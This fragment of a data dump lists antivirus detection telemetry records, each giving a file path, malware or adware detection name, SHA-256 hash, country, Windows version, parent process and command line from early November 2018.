  Row(detection=Row(filename='avscan-20181104-184613-bb983a3b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3b095aae\\AVSCAN-20181104-175338-16439388\\AVSCAN-20181104-184613-BB983A3B', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='b0f573ea98c9bf9031b213bccd148d898b39d3a775ada9f2349f0861aecc82c3', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T17:46:10Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='windowsupdate32.exe', filepath='\\\\?\\C:\\ProgramData\\WindowsUpdater\\WindowsUpdate32.exe', filesize=1600000, name='HEUR/AGEN.1004477.#M1.#R1'), hash='c7d7d681204eba799032f293c34dc6923a94286ac5c59e554a23436055a7ae2a', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T07:28:14Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='wmplayer.exe', filepath='H:\\Archivos de programa\\Windows Media Player\\wmplayer.exe', filesize=64000, name='W32/Ramnit.C.#M1.#R1'), hash='b158210d274c8f6ef5335df2970dbfd21fce76c1e7dc2787225bfd1ca922e9d4', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T02:47:21Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='setup.exe', filepath='D:\\PLAQUINHAS DIVERTIDAS\\PROGRAMAS\\Drivers Rodolfo\\Intel Chipsets driver\\Setup.exe', filesize=1024000, name='W32/Stanit.#M1.#R1'), hash='ff15b60196808f4c4d4aff891a80adc14e3dc06a6600d8cae379923f187ab05b', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T04:29:23Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-185352-f8f9b27f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3b095aae\\AVSCAN-20181104-175338-16439388\\AVSCAN-20181104-185352-F8F9B27F', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='b0f573ea98c9bf9031b213bccd148d898b39d3a775ada9f2349f0861aecc82c3', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T17:53:50Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-203832-11be6267', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2754a3e3\\AVSCAN-20181104-173744-35C87BC3\\AVSCAN-20181104-203832-11BE6267', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='b0f573ea98c9bf9031b213bccd148d898b39d3a775ada9f2349f0861aecc82c3', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T19:38:33Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-122016-d7d1c081', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2119317d\\AVSCAN-20181104-120757-821055D9\\AVSCAN-20181104-122016-D7D1C081', filesize=896000, name='ADWARE/CrossRider.Gen2.#M1.#R1'), hash='dd4b79eb1c4ad1d7709b81a9f439313c60ee4d83a9cda7ccfaaa0fc5d984457c', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T11:20:17Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='libglesv2.dll', filepath='C:\\Users\\X\\AppData\\Local\\Chromium\\Application\\58.0.2991.0\\libglesv2.dll', filesize=2304000, name='W32/Ramnit.CD.#M1.#R1'), hash='caa40d5eef7d06c4bb7eaffa86449a434bbc5aa943bca82d2e8d7b8d8a0db9ed', metadata=Row(cmdline='\\\\\\/restart \\\\\\/minimized \\\\\\/froma', country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\ByteFence\\ByteFence.exe', parentsize=3711816, timestamp='2018-11-04T05:09:47Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023eed2', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023eed2', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T22:10:00Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023c5f9', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023c5f9', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T21:33:00Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='flashupdate.exe', filepath='D:\\2018 عروض\\flashupdate.exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='e382b2754e9d655c30e73005ff3bdae57ca33692baa8bb3d26b327d341bd1067', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T14:43:09Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-171213-1832ee2d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d3e4791d\\AVSCAN-20181104-011413-055E0956\\AVSCAN-20181104-171213-1832EE2D', filesize=80000, name='TR/Ghokswa.jlssq.#M1.#R1'), hash='fa0ef7cb9d547661d7f48dca8bd1d69c570339caf685aeb3a79b29356344437e', metadata=Row(cmdline=None, country='AR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T20:11:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='back graund.exe', filepath='H:\\\xa0\\Back graund\\Back graund.exe', filesize=0, name='WORM/Taranis.2225.#M0.#R0'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T12:49:36Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='fa97aba00f1b5fe70ec5c62dc1c08d559e20d0b64045f375fda312e85c4491d5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T04:27:38Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='vbe6.dll', filepath='D:\\AutoCAD2009\\x86\\support\\VBA\\pFiles\\Common\\MSShared\\Vba\\Vba6\\vbe6.dll', filesize=2560000, name='W32/Ramnit.A.#M1.#R1'), hash='f63062e6ae4503f8bc696fd0b759d0763f5f032bf5335dbd265c92907a0459a4', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T05:36:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='kies.exe', filepath='C:\\Users\\X\\Downloads\\Samsung Kies\\Kies.exe', filesize=39360000, name='HEUR/AGEN.1007165.#M1.#R1'), hash='f57e448afcf57d849aab38b10e44ae5feaeac073fb51829bd5445f8644a96d5e', metadata=Row(cmdline=None, country='IQ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T15:11:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='fa37753799dcdb649f99c3f7a9e33c670da40666dfb0c9721f2b33f6df96f677', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-31\\FA37753799DCDB649F99C3F7A9E33C670DA40666DFB0C9721F2B33F6DF96F677', filesize=104000, name='HEUR/AGEN.1032151.#M1.#R1'), hash='fa37753799dcdb649f99c3f7a9e33c670da40666dfb0c9721f2b33f6df96f677', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T14:43:48Z'), dt=datetime.date(2018, 11, 1))],
 [Row(detection=Row(filename='gamelogic.exe', filepath='I:\\ألعاب\\Games 1\\بليردو\\gamelogic\\gamelogic.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='1c5eb2619262d5e3ad6cf9bb4b426c77f5fae858e22fa503d330aa1a94b6b8e7', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:41:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wechatweb.exe', filepath='C:\\PROGRAM FILES (X86)\\Tencent\\WeChat\\WeChatWeb.exe', filesize=1208000, name='W32/Sality.AT.#M1.#R1'), hash='339f01ef66f8a7ed4a5069a9a0ded2bbb922fa0e7b00b3671be9d10f91cc8593', metadata=Row(cmdline='-autorun', country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Tencent\\WeChat\\WeChat.exe', parentsize=492744, timestamp='2018-11-02T09:00:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='srv64', filepath='C:\\Windows\\System32\\srv64', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-02T01:22:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='uninst.exe', filepath='C:\\Users\\X\\Desktop\\MY BACK UP\\PERSONAL\\BACK UP FROM GERICOM\\TRANSFER 2\\SETUP (E)(web camera)\\vp\\uninst.exe', filesize=320000, name='W32/Virut.Gen.#M1.#R1'), hash='02d74c4c39c365bab234698a38aa2ec83e0628752b63030dbc179d6222607c1b', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='GR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T08:12:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='\\\\?\\c:\\windows\\system32\\maintenancesservices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:35:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-111521-063fae43', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8e2396b3\\AVSCAN-20181102-110019-39F8A128\\AVSCAN-20181102-111521-063FAE43', filesize=624000, name='PUA/InstallCo.zlq.#M1.#R1'), hash='1bcbfd4eb025fcb76b07b3b7928cf2dc8d5132d5280547f68749d390b11b026d', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:15:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-064210-23dce2c7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9e4d80d8\\AVSCAN-20181102-003900-7AC79805\\AVSCAN-20181102-064210-23DCE2C7', filesize=64000, name='HEUR/AGEN.1006519.#M1.#R1'), hash='399056504e511b370f54b9e31f3c52e6554f8e01d83e93eb29f4497816f09f3c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:44:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='sync.exe', filepath='C:\\Users\\pr\\AppData\\Roaming\\13FD57~1\\sync.exe', filesize=2112000, name='Adware/DealPly.676f9c.#M1.#R1'), hash='676f9c2643954a348f02805641c525fb2a86d7840381d15949684d202f492c4a', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T16:03:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='67f10537268acdfd45aa577ec35fb4aea6f0880ee2957f243795d1d936079303', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\67F10537268ACDFD45AA577EC35FB4AEA6F0880EE2957F243795D1D936079303', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='67f10537268acdfd45aa577ec35fb4aea6f0880ee2957f243795d1d936079303', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:58:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='flashupdate (1).exe', filepath='C:\\Users\\X\\Documents\\Downloads\\flashupdate (1).exe', filesize=1536000, name='TR/CoinMiner.CY.#M1.#R1'), hash='53f241e48edce037f68543a11c57cf05e084d97d6dc173ac163fec4d9fd50b02', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='BA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T22:16:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='45c7249baeeaf3434ce18a12468b50b45f3a759d64e6da922555d7b684828a59', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\45C7249BAEEAF3434CE18A12468B50B45F3A759D64E6DA922555D7B684828A59', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='45c7249baeeaf3434ce18a12468b50b45f3a759d64e6da922555d7b684828a59', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:34:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-03-03-20-27.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-20T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-02T22:30:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-02-17-42-00.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-28T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-02T17:58:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-150018-e1117673', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a9d7dcb6\\AVSCAN-20181102-145232-7F982004\\AVSCAN-20181102-150018-E1117673', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:00:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T01:48:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-155905-e75bdbe8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0858748c\\AVSCAN-20181102-155607-D410DE34\\AVSCAN-20181102-155905-E75BDBE8', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:59:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wmplayer.exe', filepath='\\\\?\\C:\\Program Files\\Windows Media Player\\wmplayer.exe', filesize=256000, name='W32/Virut.Gen.#M1.#R1'), hash='4ea270655c6133e002b1208417508d49616245c291894ca12c02324374a11847', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:10:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='inpaint43-downloader.exe', filepath='L:\\Users\\X\\Downloads\\inpaint43-Downloader.exe', filesize=512000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='08a157a121fdd722237f4c2d98c1bf5f637716af11250de253bda58eb7d3e651', metadata=Row(cmdline='\\\\\\/Processid:{3AD05575-8857-4850-9277-11B85BDB8E09}', country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\dllhost.exe', parentsize=19360, timestamp='2018-11-02T17:17:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yamicsoft_aio_5in1_v2.4_keygen_uret.exe', filepath='E:\\Programs\\Windows 10 Manager 2.3.3\\Yamicsoft_AIO_5in1_v2.4_Keygen_URET.exe', filesize=1788000, name='HEUR/AGEN.1023554.#M1.#R1'), hash='057fa680c3f495aa6309f249083f3eba9504ecf9a397217fd0a711f1303e32aa', metadata=Row(cmdline=None, country='SA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-02T22:11:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yamicsoft_aio_5in1_v2.4_keygen_uret_8d3d3483.exe', filepath='F:\\JDownloader\\Yamicsoft.Windows.10.Manager.v2.3.5\\URET\\Yamicsoft_AIO_5in1_v2.4_Keygen_URET_8d3d3483.exe', filesize=1788000, name='HEUR/AGEN.1023554.#M1.#R1'), hash='057fa680c3f495aa6309f249083f3eba9504ecf9a397217fd0a711f1303e32aa', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T14:01:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='sentstrt.exe', filepath='\\?\\G:\\PLC程式\\GT-D V6.4\\SystemDriverOld\\WIN_9x\\sentstrt.exe', filesize=256000, name='W32/Jadtre.K.#M1.#R1'), hash='35a934634fb69c7ea994979823e3aa00962a172b0d06f2aa24751081c4de7849', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:28:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:27:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='gpgsplit.exe', filepath='\\\\?\\C:\\NIFPGA\\programs\\Vivado2013_4\\tps\\win32\\git-1.8.3\\bin\\gpgsplit.exe', filesize=256000, name='W32/Sality.AT.#M1.#R1'), hash='284cc3e7c6877e694e4ee78d4c588d5a36daaacd6c15d583def03eb0f277da1f', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T16:51:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='nircmd.exe', filepath='G:\\a phuong\\New Folder (2)\\Boot\\DLCD\\Programs\\nircmd.exe', filesize=128000, name='W32/Sality.AT.#M1.#R1'), hash='18216442e8316f4f4a93fa536dc3a231e7af31d46894060e14defa1c0d7fb4c7', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:17:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:03:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:08:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-110442-2e8bb67c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8cb68e92\\AVSCAN-20181102-110419-2AFEFE56\\AVSCAN-20181102-110442-2E8BB67C', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:04:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='2c9f9e2d93243fff2d209fb9bece4cc53c703688686962d69b3067c6546a729a', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\2C9F9E2D93243FFF2D209FB9BECE4CC53C703688686962D69B3067C6546A729A', filesize=2176000, name='HEUR/AGEN.1034483.#M1.#R1'), hash='2c9f9e2d93243fff2d209fb9bece4cc53c703688686962d69b3067c6546a729a', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-38.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-37.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T13:33:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:30:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:25:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='convertpdf.exe', filepath='D:\\New folder\\Program Files\\Adobe\\Acrobat 8.0\\Designer 8.0\\ConvertPDF.exe', filesize=616000, name='W32/Sality.AT.#M1.#R1'), hash='2f802a9ae598af9d87138d3c46c332e9b73cf6fa633e70d39b4d689810a2278a', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\dwm.exe', parentsize=92672, timestamp='2018-11-02T03:52:58Z'), dt=datetime.date(2018, 11, 2)),
